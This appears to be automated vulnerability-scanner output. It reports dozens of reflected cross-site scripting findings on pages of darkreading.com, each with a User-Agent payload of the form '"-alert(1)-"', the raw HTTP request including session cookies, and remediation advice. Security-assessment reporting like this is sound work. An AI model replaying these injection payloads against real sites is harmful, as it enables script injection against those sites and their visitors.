The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c920"-alert(1)-"32acd697e01 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/cs-island/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8c920"-alert(1)-"32acd697e01
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6a29"-alert(1)-"9e344aef5f5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/dark-dominion/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d6a29"-alert(1)-"9e344aef5f5
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40a2b"-alert(1)-"da272796845 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil-bytes/index.html HTTP/1.1
Host: www.darkreading.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.1040a2b"-alert(1)-"da272796845
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54a09"-alert(1)-"ef2a76cf5c4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil_bytes/index.html?subSection=evil_bytes HTTP/1.1
Host: www.darkreading.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.1054a09"-alert(1)-"ef2a76cf5c4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f570"-alert(1)-"95b61672bba was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/hacked-off/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4f570"-alert(1)-"95b61672bba
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34f37"-alert(1)-"7da1c50bc32 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/in-search-of-malware/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)34f37"-alert(1)-"7da1c50bc32
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8050"-alert(1)-"e4ac5bc580f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/security-views/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f8050"-alert(1)-"e4ac5bc580f
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1438e"-alert(1)-"15e2bca155c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/sophoslabs-insights/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1438e"-alert(1)-"15e2bca155c
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8336"-alert(1)-"fc9d06058a8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/calendar.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c8336"-alert(1)-"fc9d06058a8
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa51a"-alert(1)-"c074a77ad2c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsletters/subscribe.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa51a"-alert(1)-"c074a77ad2c
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89bd7"-alert(1)-"08a9be8278b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)89bd7"-alert(1)-"08a9be8278b
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae88a"-alert(1)-"2a7e4850fd1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/antivirus HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae88a"-alert(1)-"2a7e4850fd1
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 473f8"-alert(1)-"5fcbd91432 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/application-security HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)473f8"-alert(1)-"5fcbd91432
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eeb1"-alert(1)-"9124b85d0ed was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/208803634/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8eeb1"-alert(1)-"9124b85d0ed
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1575e"-alert(1)-"77c8a9d7d1f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/208803672/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1575e"-alert(1)-"77c8a9d7d1f
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53392"-alert(1)-"956fb230fca was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/220000718/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)53392"-alert(1)-"956fb230fca
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 950e7"-alert(1)-"497f3375e78 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222200174/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)950e7"-alert(1)-"497f3375e78
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f282e"-alert(1)-"52692c5d7b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222300840/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f282e"-alert(1)-"52692c5d7b
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ae11"-alert(1)-"8ad807aef61 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222301436/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8ae11"-alert(1)-"8ad807aef61
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0c0f"-alert(1)-"b68b6e94a83 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222301500/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c0c0f"-alert(1)-"b68b6e94a83
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8453"-alert(1)-"c082d70f6e4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222600139/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d8453"-alert(1)-"c082d70f6e4
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2ffa"-alert(1)-"f5a5634352f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222900286/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a2ffa"-alert(1)-"f5a5634352f
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b98d"-alert(1)-"c7e78f5831 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222900775/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5b98d"-alert(1)-"c7e78f5831
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18f60"-alert(1)-"d3f3e81c0c0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/223100233/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)18f60"-alert(1)-"d3f3e81c0c0
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aac3"-alert(1)-"4d87bc548ff was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/223100436/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3aac3"-alert(1)-"4d87bc548ff
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb53c"-alert(1)-"e84569fa5a4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/223100902/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fb53c"-alert(1)-"e84569fa5a4
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61a18"-alert(1)-"8f107851f0f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
